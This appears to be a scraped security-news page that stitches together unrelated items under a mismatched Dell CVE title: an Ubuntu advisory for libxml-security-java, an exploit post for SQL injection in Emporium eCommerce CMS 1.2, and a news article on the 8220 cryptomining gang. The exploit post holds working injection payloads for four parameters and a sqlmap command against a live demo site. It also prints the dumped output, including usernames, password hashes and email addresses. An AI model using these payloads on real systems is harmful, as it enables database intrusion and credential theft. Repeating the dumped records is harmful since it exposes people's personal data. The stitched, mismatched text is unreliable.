CVE-2022-33923: DSA-2022-159: Dell PowerStore Family Security Update for Multiple Vulnerabilities

Ubuntu Security Notice 5525-1 - It was discovered that Apache XML Security for Java incorrectly passed a configuration property when creating specific key elements. This allows an attacker to abuse an XPath Transform to extract sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5525-1  
July 20, 2022

libxml-security-java vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Apache XML Security for Java could be made to expose sensitive information.

Software Description:  
- libxml-security-java: Apache XML Security for Java

Details:

It was discovered that Apache XML Security for Java incorrectly passed a  
configuration property when creating specific key elements. This allows an  
attacker to abuse an XPath Transform to extract sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
libxml-security-java 2.0.10-2+deb11u1build0.20.04.1

Ubuntu 18.04 LTS:  
libxml-security-java 2.0.10-2~18.04.1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-5525-1  
CVE-2021-40690

Package Information:  
https://launchpad.net/ubuntu/+source/libxml-security-java/2.0.10-2+deb11u1build0.20.04.1  
https://launchpad.net/ubuntu/+source/libxml-security-java/2.0.10-2~18.04.1

Ubuntu Security Notice USN-5525-1

Emporium eCommerce Online Shopping CMS version 1.2 suffers from a remote SQL injection vulnerability.

    ┌┌────────────────────────────────────────────────────────────────────────────────────┐││                                  C r a C k E r                                    ┌┘┌┘              T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────          From The Ashes and Dust Rises An Unimaginable crack....           ────┐┌┌────────────────────────────────────────────────────────────────────────────────────┐┌┘                                   [ Exploits ]                                    ┌┘└────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                     │ │                                         :│  Website  : mybizcms.com                │ │                                         ││  Vendor   : mybizcms                    │ │                                         ││  Software : Emporium eCommerce -        │ │                                         ││             Online Shopping CMS v 1.2   │ │ Emporium eCommerce                      ││  Vuln Type: Remote SQL Injection        │ │                                         ││  Method   : GET                         │ │ is a complete online                    ││  Critical : High [░░▒▒▓▓██]             │ │ shopping platform for all your needs    ││  Impact   : Database Access             │ │                                         ││                                         │ │                                         ││ ────────────────────────────────────────┘ └─────────────────────────────────────────││                           B4nks-NET irc.b4nks.tk #unix                             ┌┘└────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                     :│  Release Notes:                                                                     ││  ═════════════                                                                      ││  Typically used for remotely exploitable vulnerabilities that can lead to           ││  system compromise.                                                                 ││                                                                                     │┌┌────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                   ┌┘└────────────────────────────────────────────────────────────────────────────────────┘┘Greets:       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk     loool, DevS, Dark-Gost       CryptoJob (Twitter) twitter.com/CryptozJob┌┌────────────────────────────────────────────────────────────────────────────────────┐┌┘                                 © CraCkEr 2022                                    ┌┘└────────────────────────────────────────────────────────────────────────────────────┘┘There's 4 parameters Vulnerable to SQL Injection in /categories/other-categories?GET parameter 'min_price' is vulnerable---Parameter: min_price (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)    Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)    Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41---GET parameter 'percentage' is vulnerable.---Parameter: percentage (GET)    Type: boolean-based blind    Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)    Payload: percentage=MAKE_SET(4728=4728,5649)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS)---GET parameter 'review_ratings' is vulnerable---Parameter: review_ratings (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)---GET parameter 'brand[]' is vulnerable---Parameter: brand[] (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: brand[]=15');SELECT SLEEP(5)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc---Live Demo Site:https://mybizcms.com/demos/multivendor/[+] Starting the Attacksqlmap.py -u "https://mybizcms.com/demos/multivendor/categories/other-categories?brand%5B%5D=15" --current-db --batch --random-agent[INFO] the back-end DBMS is MySQLweb application technology: Apache, PHP 7.3.33, PHPback-end DBMS: MySQL >= 5.0 (MariaDB fork)[INFO] fetching current databasecurrent database: 'mybizcms_multivendor'fetching tables for database: 'mybizcms_multivendor'[101 tables] +--------------------------+| returns                  || ad_placements            || addresses                || ads                      || attribute_items          || attributes               || authorize_net_settings   || brands                   || categories               || collections              || company                  || counties                 || countries                || credit_card_types        || cronjobs                 || customers                || deliveries               || delivery_items           || delivery_options         || delivery_status          || discounts                || email_templates          || facebook_settings        || faqs                     || flash_sale_items         || flash_sales              || flutterwave_settings     || github_settings          || google_settings          || item_status              || labels                   || linkedin_settings        || logs                     || media                    || mpesa_settings           || newsletters              || notifications            || options                  || order_details            || order_items              || order_status             || orders                   || pages                    || payment_options          || payment_status           || payments                 || payout_modes             || payout_status            || payouts                  || paypal_pro_settings      || paypal_standard_settings || paytm_settings           || payu_money_settings      || permissions              || pesapal_settings         || pickup_stations          || post_categories          || post_comments            || posts                    || product_attributes       || product_images           || product_reviews          || product_stock            || product_types            || product_variants         || product_wholesales       || products                 || quicks                   || return_reasons           || return_status            || rewards                  || role_sub_permissions     || roles                    || saved_items              || sessions                 || shipping_fees            || shipping_regions         || shipping_weights         || shops                    || sliders                  || stripe_settings          || sub_permissions          || subscribers              || supported_currencies     || tags                     || taxes                    || temp_data                || ticket_priority          || ticket_replies           || ticket_status            || tickets                  || timezones                || twitter_settings         || twocheckout_settings     || user_status              || user_sub_permissions     || users                    || variant_choices          || variant_options          || wallets                  || weights                  |+--------------------------+ fetching columns for table 'users' in database 'mybizcms_multivendor' Table: users[34 columns] +------------------------+--------------+| Column                 | Type         |+------------------------+--------------+| calling_code           | varchar(11)  || city                   | varchar(100) || company                | varchar(100) || country_id             | int(11)      || date_added             | datetime     || default_billing        | int(11)      || default_currency       | int(11)      || default_language       | varchar(40)  || default_shipping       | int(11)      || department_id          | int(11)      || email                  | varchar(100) || firstname              | varchar(50)  || last_ip                | varchar(40)  || last_login             | datetime     || last_password_change   | datetime     || lastname               | varchar(50)  || latitude               | varchar(300) || longitude              | varchar(300) || new_pass_key_requested | datetime     || passkey                | varchar(32)  || password               | varchar(256) || payout_address         | longtext     || payout_mode_id         | int(11)      || phone                  | varchar(30)  || postal_code            | varchar(100) || profile_image          | varchar(150) || role_id                | int(11)      || state                  | varchar(50)  || street                 | varchar(100) || user_id                | int(11)      || user_status_id         | int(11)      || user_uid               | varchar(50)  || username               | varchar(100) || zip_code               | varchar(15)  |+------------------------+--------------+ fetching entries of column(s) 'email,password,username' for table 'users' in database 'mybizcms_multivendor' Database: mybizcms_multivendorTable: users[7 entries] +----------+--------------------------------------------------------------+------------------------+| username | password                                                     | email                  |+----------+--------------------------------------------------------------+------------------------+| admin    | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | admin@mybizcms.com     || one      | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | evanskynot25@gmail.com || two      | $2y$10$K27UTI0KPeP.N.6EzxED6eVgU6jcAJDq8vf.EuCxzGSEFdSyI/oeC | jdoe@gmail.con         || umuruviq | $2y$10$SID3yybe763.xosi8qwqkOTG8baLQQpIVdfrYzqG9dTPhcTtVL5Bu | sync@mybizcms.com      || three    | $2y$10$iBnMAPE.3FDeivo2kYPhSerMS05TmbIZQ/bLD6FcmvCowStICaaw. | tew@gmail.com          || user     | $2y$10$eZ0/eOZ5R.Mwju4nCqIgHuaVnBosugt8ADjwMCDzQP6oUUH2l5NVK | user@mybizcms.com      || tbjjrhls | $2y$10$XKA6hBkZlCAU3T7KcQm.7ubs06COQH4mCcGHmBMwzyYp016oBYoPe | vendor@mybizcms.com    |+----------+--------------------------------------------------------------+------------------------+[-] Done

Emporium eCommerce Online Shopping CMS 1.2 SQL Injection

The 8220 cryptomining group has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021.
"8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors," Tom Hegel of SentinelOne

The **8220 cryptomining group** has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021.

"8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors," Tom Hegel of SentinelOne said in a Monday report.

The growth is said to have been fueled through the use of Linux and common cloud application vulnerabilities and poorly secured configurations for services such as Docker, Apache WebLogic, and Redis.

Active since early 2017, the Chinese-speaking, Monero-mining threat actor was most recently seen targeting i686 and x86\_64 Linux systems by means of weaponizing a recent remote code execution exploit for Atlassian Confluence Server (CVE-2022-26134) to drop the PwnRig miner payload.

"Victims are not targeted geographically, but simply identified by their internet accessibility," Hegel pointed out.

Besides executing the PwnRig cryptocurrency miner, the infection script is also designed to remove cloud security tools and carry out SSH brute-forcing via a list of 450 hard-coded credentials to further propagate laterally across the network.

The newer versions of the script are also known to employ blocklists to avoid compromising specific hosts, such as honeypot servers that could flag their illicit efforts.

The PwnRig cryptominer, which is based on the open source Monero miner XMRig, has received updates of its own as well, using a fake FBI subdomain with an IP address pointing to a legitimate Brazilian federal government domain to create a rogue pool request and obscure the real destination of the generated money.

The ramping up of the operations is also viewed as an attempt to offset falling prices of cryptocurrencies, not to mention underscore a heightened "battle" to take control of victim systems from competing cryptojacking-focused groups.

"Over the past few years 8220 Gang has slowly evolved their simple, yet effective, Linux infection scripts to expand a botnet and illicit cryptocurrency miner," Hegel concluded. "The group has made changes over the recent weeks to expand the botnet to nearly 30,000 victims globally."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apache